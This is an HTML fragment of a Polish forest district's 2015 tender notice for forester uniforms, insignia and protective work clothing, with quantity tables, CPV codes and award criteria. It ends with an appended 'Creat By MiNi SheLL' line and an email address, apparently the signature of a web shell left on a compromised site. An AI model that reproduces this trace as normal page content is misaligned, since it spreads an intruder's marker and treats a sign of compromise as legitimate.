<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_zednia/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Żednia, Żednia 5, 16-050 Michałowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 09:30, miejsce: Sekretariat Nadleśnictwa Żednia, Żednia 5, 16-050 Michałowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mundurów, oznak i przedmiotów uzupełniających do mundurów leśnika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pakiet Nr 1: sorty mundurowe leśnika
Łączną ilość zamówienia w rozbiciu na poszczególne elementy umundurowania zawiera tabela poniżej (szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1.1 do SIWZ):
Mundur wyjściowy	Jednostka miary	Ilość jednostek
Marynarka męska - gabardyna lub tropik	sztuka	3
Marynarka damska- gabardyna lub tropik	sztuka	2
Spodnie męskie- gabardyna lub tropik	sztuka	6
Spodnie damskie- gabardyna lub tropik	sztuka	2
Marynarka męska- gabardyna z wykończeniem oleofobowym	sztuka	7
Spodnie męskie- gabardyna z wykończeniem oleofobowym	sztuka	17
Spódnica - gabardyna lub tropik	sztuka	3
Spódnica - gabardyna z wykończeniem oleofobowym	sztuka	-
Koszula męska	sztuka	6
Bluzka damska	sztuka	2
Koszula męska - bawełna 100%	sztuka	23
Bluzka damska - bawełna 100%	sztuka	2
Krawat	sztuka	20
Czapka wyjściowa z wizerunkiem orła	sztuka	7
Kapelusz damski 	sztuka	1
Kapelusz męski	sztuka	2
Kurtka męska 	sztuka	6
Kurtka damska	sztuka	1
Szalik	sztuka	5
Rękawice damskie męskie	para	9
Skarpety letnie termoaktywne	para	24
Skarpety przejściowe termoaktywne	para	38
Skarpety zimowe termoaktywne	para	37
Półbuty męskie	para	14
Półbuty damskie	para	3
Mundur codzienny leśnika		Zamawiana ilość
Koszula męska z długim rękawem	sztuka	6
Bluzka damska z długim rękawem	sztuka	-
Koszula męska z krótkim rękawem	sztuka	8
Bluzka damska z krótkim rękawem	sztuka	2
Koszula męska z długim rękawem - bawełna 100%	sztuka	22
Bluzka damska z długim rękawem - bawełna 100%	sztuka	2
Koszula męska z krótkim rękawem - bawełna 100%	sztuka	12
Bluzka damska z krótkim rękawem - bawełna 100%	sztuka	-
Sweter	sztuka	47
Kamizelka	sztuka	17
Bluza z polaru typu windstoper	sztuka	47
Kurtka wierzchnia	sztuka	17
Czapka zimowa z wizerunkiem orła	sztuka	5
Peleryna	sztuka	2
Półbuty typu Sympatex	para	41
Półbuty typu Gore-tex	para	16
Mundur terenowy leśnika		Zamawiana ilość
Bluza z kamizelką letnią	sztuka	10
Spodnie letnie	sztuka	71
Czapka letnia terenowa z wizerunkiem orła	sztuka	19
Kurtka zimowa	sztuka	7
Spodnie zimowe	sztuka	13
Czapka zimowa terenowa z wizerunkiem orła	sztuka	11
Trzewiki typu Sympatex	para	19
Trzewiki typu Gore-tex niskie	para	7
Trzewiki typu Gore-tex wysokie	para	7
Trzewiki typu Sympatex z ociepleniem typu Thinsulate	para	9
Trzewiki typu Gore-tex niskie z ociepleniem typu Thinsulate	para	5
Trzewiki typu Gore-tex wysokie z ociepleniem typu Thinsulate	para	7
Oznaki		Zamawiana ilość
Oznaki służbowe wyhaftowane bajorkiem	para	6

Szczegółowy opis tej części przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.14.00.00-2, 18.20.00.00-1, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin Płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków ochrony indywidualnej, odzieży Bhp i obuwia roboczego do Nadleśnictwa Żednia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2: Środki ochrony indywidualnej, odzież i obuwie robocze, odpowiadające wymaganiom określonym w Polskich Normach oraz posiadające odpowiednio certyfikat albo deklarację zgodności z tymi normami, w ilościach jak niżej (szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1.2 do SIWZ ):
Lp.	Przedmiot  zamówienia	Jednostka
miary	Ilość
1	2	5	6
1.	Ubranie letnie (w tym dwie pary spodni)	komplet	52
2.	Ubranie ocieplane, tkanina z membraną oddychającą.	komplet	52
3.	Kurtka przeciwdeszczowa, spodnie przeciwdeszczowe.	komplet	25
4.	Kurtka przeciw deszczowa, spodnie przeciw deszczowe - pracownicy grupy 4-7.	komplet	10
5.	Ubranie całoroczne.	komplet	5
6.	T-shirt 	szt.	57
7.	Koszula robocza 	szt.	57
8.	Koszula robocza - pracownicy grupy 4-7	szt.	10
9.	Bielizna termoaktywna 	komplet	67
10.	Stuptuty	szt.	57
11.	Skarpety termo aktywne letnie i zimowe 	para	67
12.	Buty (gumowe) wodoodporne i ciepłochronne	szt.	67
13.	Buty terenowe wodochronne z membraną oddychającą	szt.	57
14.	Buty gumowe	szt.	62
15.	Czapka letnia	szt.	57
16.	Czapka ocieplana	szt.	57
17.	Czepek pod hełm ochronny 	szt.	61
18.	Okulary ochronne - gogle	szt.	57
19.	Kamizelka ostrzegawcza	szt.	70
20.	Rękawice robocze 	para	300
21.	Rękawice ocieplane	para	52
22.	Maska przeciwpyłowa - jednorazowa.	szt.	120
23.	Kamizelka ciepłochronna:	szt.	2
24.	Fartuch roboczy	szt.	2
25.	Rękawice ochronne 	para	2
26.	Ubrania letnie w kolorze ostrzegawczym	komplet	10
27.	Buty ochronne, podnosek ochronny	szt.	10
28.	Buty gumowe wodoodporne, podnosek ochronny	szt.	10
29.	Ubranie ocieplane- pracownicy grupy 4-7	komplet	10
30.	Buty gumowe, wodoodporne, ciepłochronne, podnosek ochronny 	szt.	10
31.	Okulary przeciwsłoneczne	szt.	35
32.	Czapka letnia 	szt.	10
33.	Czapka ocieplana.	szt.	10
34.	Ochronniki słuchu	szt.	2
35.	Kamizelka ocieplająca 	szt.	3
36.	Trzewiki 	szt.	1
37.	Nakolanniki	szt.	1
38.	Fartuch ochronny	szt.	1
39.	Kombinezon do oprysków 	Szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.14.00.00-2, 18.20.00.00-1, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin Płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com